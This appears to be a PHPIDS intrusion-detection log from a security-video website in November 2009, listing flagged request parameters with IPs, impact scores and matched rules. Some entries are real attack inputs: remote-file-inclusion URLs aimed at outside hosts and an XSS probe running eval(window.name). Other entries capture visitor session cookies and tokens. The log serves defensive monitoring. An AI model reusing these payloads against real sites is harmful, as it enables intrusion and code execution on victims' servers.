Value:	security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
Page:	/i.php?page=security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
IP:	216.252.64.78
Impact:	26
Created:	2009-11-08 06:07:18
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59524
Name:	GET.page
Value:	security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
Page:	/i.php?page=security///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moretonisland.com.au/wav.ico?
IP:	216.252.64.78
Impact:	26
Created:	2009-11-08 06:07:18
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59519
Name:	REQUEST.path
Value:	/search, PREF=ID=61fb9819b630ee3a:TM=1257687876:LM=1257687876:S=kW6pWxv9To3Ldyn6
Page:	/i.php?page=videos/recovercookies
IP:	132.239.17.225
Impact:	30
Created:	2009-11-08 05:45:30
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59520
Name:	REQUEST.domain
Value:	.google.de, NID=28=VDq513JnHqOh3qL8_ycTUUYA59nnq0jfTz_pRXYJ8ae0z-7d_oN9maLdUcoKFqvQvVg7wiHYpFciyM5n5uu1GoCg366MpOI2MF5lAVhcM6LVcjvnJAFM0AxhPQa7C3Mr
Page:	/i.php?page=videos/recovercookies
IP:	132.239.17.225
Impact:	30
Created:	2009-11-08 05:45:30
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59521
Name:	COOKIE.path
Value:	/search, PREF=ID=61fb9819b630ee3a:TM=1257687876:LM=1257687876:S=kW6pWxv9To3Ldyn6
Page:	/i.php?page=videos/recovercookies
IP:	132.239.17.225
Impact:	30
Created:	2009-11-08 05:45:30
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59522
Name:	COOKIE.domain
Value:	.google.de, NID=28=VDq513JnHqOh3qL8_ycTUUYA59nnq0jfTz_pRXYJ8ae0z-7d_oN9maLdUcoKFqvQvVg7wiHYpFciyM5n5uu1GoCg366MpOI2MF5lAVhcM6LVcjvnJAFM0AxhPQa7C3Mr
Page:	/i.php?page=videos/recovercookies
IP:	132.239.17.225
Impact:	30
Created:	2009-11-08 05:45:30
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59517
Name:	REQUEST.page
Value:	security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:	/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:	91.121.75.82
Impact:	22
Created:	2009-11-08 02:11:00
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59518
Name:	GET.page
Value:	security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:	/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:	91.121.75.82
Impact:	22
Created:	2009-11-08 02:11:00
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59515
Name:	REQUEST.page
Value:	security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:	/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:	91.121.75.82
Impact:	22
Created:	2009-11-08 02:10:59
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59516
Name:	GET.page
Value:	security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping" >IGiGLE: Irongeek
Page:	/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping%22%20%3EIGiGLE:%20Irongeek&
IP:	91.121.75.82
Impact:	22
Created:	2009-11-08 02:10:59
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59513
Name:	REQUEST.test
Value:	"><script>eval(window.name)</script>
Page:	/i.php?test=%22><script>eval(window.name)</script>
IP:	65.55.207.133
Impact:	72
Created:	2009-11-07 18:28:32
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59514
Name:	GET.test
Value:	"><script>eval(window.name)</script>
Page:	/i.php?test=%22><script>eval(window.name)</script>
IP:	65.55.207.133
Impact:	72
Created:	2009-11-07 18:28:32
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59511
Name:	REQUEST.test
Value:	"><script>eval(window.name)</script>
Page:	/i.php?test=%22><script>eval(window.name)</script>
IP:	65.55.207.133
Impact:	72
Created:	2009-11-07 18:28:31
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59512
Name:	GET.test
Value:	"><script>eval(window.name)</script>
Page:	/i.php?test=%22><script>eval(window.name)</script>
IP:	65.55.207.133
Impact:	72
Created:	2009-11-07 18:28:31
Details:	Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4 Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16 Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17 Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59509
Name:	REQUEST.page
Value:	security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:05:31
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59510
Name:	GET.page
Value:	security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:05:31
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59507
Name:	REQUEST.page
Value:	security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:05:20
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59508
Name:	GET.page
Value:	security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:05:20
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59505
Name:	REQUEST.page
Value:	security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:04:39
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59506
Name:	GET.page
Value:	security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:04:39
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59503
Name:	REQUEST.page
Value:	security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:04:38
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59504
Name:	GET.page
Value:	security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:04:38
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59501
Name:	REQUEST.page
Value:	security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:02:16
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59502
Name:	GET.page
Value:	security/phpids-install-notes /?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/phpids-install-notes%20%20/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:02:16
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59500
Name:	GET.page
Value:	security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:02:15
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59499
Name:	REQUEST.page
Value:	security/?_zb_path=http://www.masuccessguy.com//audio/swf??
Page:	/i.php?page=security/?_zb_path=http://www.masuccessguy.com//audio/swf??
IP:	89.171.190.107
Impact:	20
Created:	2009-11-07 18:02:14
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59481
Name:	REQUEST.cm__tracker
Value:	a:1:{i:0;s:65:"/blog/post/2920/lifting-your-click-through-rate-with-a-b-testing/";}
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59482
Name:	REQUEST.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20341
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59483
Name:	REQUEST.language
Value:	--
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59484
Name:	REQUEST.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:19 PM
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59485
Name:	REQUEST.DB
Value:	msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59486
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3976086&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59487
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=1658848&CFTOKEN#=38008515&jsessionid#=3030bf483831525c756e3c4d17a2676636a6#lastvisit={ts '2009-11-07 20:00:20'}#timecreated={ts '2009-11-07 11:47:35'}#hitcount=15#cftoken=38008515#cfid=1658848#
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.2307692307692 Converted: ((((+::

ID:	59488
Name:	REQUEST.exp_tracker
Value:	a:4:{i:0;s:67:"/news/permalink/substance-new-realtime-3d-application-using-opengl/";i:1;s:73:"/eartotheground/item/20091106_dems_make_final_push_for_health_bill_votes/";i:2;s:71:"/apple/comment/an-open-letter-to-the-verizon-theres-a-map-for-that-ads/";i:3;s:56:"/events/detail/ryan-adams-at-the-morrison-hotel-gallery/";}
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59489
Name:	REQUEST.ci_session
Value:	a:4:{s:10:"session_id";s:32:"e21d32fc5521bc442985cb54f456e580";s:10:"ip_address";s:14:"213.239.213.54";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}9f855e50a6baaf0803b7152253c9c684
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++:

ID:	59490
Name:	COOKIE.cm__tracker
Value:	a:1:{i:0;s:65:"/blog/post/2920/lifting-your-click-through-rate-with-a-b-testing/";}
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59491
Name:	COOKIE.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20341
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59492
Name:	COOKIE.language
Value:	--
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59493
Name:	COOKIE.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:19 PM
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59494
Name:	COOKIE.DB
Value:	msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59495
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3976086&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59496
Name:	COOKIE.CFGLOBALS
Value:	urltoken=CFID#=1658848&CFTOKEN#=38008515&jsessionid#=3030bf483831525c756e3c4d17a2676636a6#lastvisit={ts '2009-11-07 20:00:20'}#timecreated={ts '2009-11-07 11:47:35'}#hitcount=15#cftoken=38008515#cfid=1658848#
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.2307692307692 Converted: ((((+::

ID:	59497
Name:	COOKIE.exp_tracker
Value:	a:4:{i:0;s:67:"/news/permalink/substance-new-realtime-3d-application-using-opengl/";i:1;s:73:"/eartotheground/item/20091106_dems_make_final_push_for_health_bill_votes/";i:2;s:71:"/apple/comment/an-open-letter-to-the-verizon-theres-a-map-for-that-ads/";i:3;s:56:"/events/detail/ryan-adams-at-the-morrison-hotel-gallery/";}
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59498
Name:	COOKIE.ci_session
Value:	a:4:{s:10:"session_id";s:32:"e21d32fc5521bc442985cb54f456e580";s:10:"ip_address";s:14:"213.239.213.54";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}9f855e50a6baaf0803b7152253c9c684
Page:	/i.php?page=videos%2F802-11-wireless-security-class-part-1
IP:	213.239.213.54
Impact:	216
Created:	2009-11-07 17:37:54
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++:

ID:	59433
Name:	REQUEST.PREF
Value:	ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59434
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59435
Name:	REQUEST.DB
Value:	msRandX=62&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59436
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=4605321&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59437
Name:	REQUEST.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20358
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59438
Name:	REQUEST._designrelated_id
Value:	BAh7CDoQZXhwaXJ5X3RpbWV1OglUaW1lDRZpG4A7TUHHOhJjcmVhdGlvbl90 aW1ldTsGDfZoG4DD4m7GIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	bGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8b79c2ed5d395483c2803613f3c3b143223ac77f Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.6363636363636

ID:	59439
Name:	REQUEST.Apache
Value:	"D~51fc3947f14d8427b7d6ac529710e832"
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.3333333333333

ID:	59440
Name:	COOKIE.PREF
Value:	ID=0476ea5eac7fc9f2:TM=1257636028:LM=1257636028:S=-_VJl9eVH88obzos
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59441
Name:	COOKIE.CFGLOBALS
Value:	urltoken=CFID#=1654856&CFTOKEN#=27435994&jsessionid#=30307eacdd69846e5c15157f4023691a2b7b#lastvisit={ts '2009-11-07 13:48:18'}#timecreated={ts '2009-11-07 10:17:13'}#hitcount=6#cftoken=27435994#cfid=1654856#
Page:	/i.php?page=videos%2Fowasp-top-5-louisville
IP:	62.141.48.83
Impact:	170
Created:	2009-11-07 17:37:53
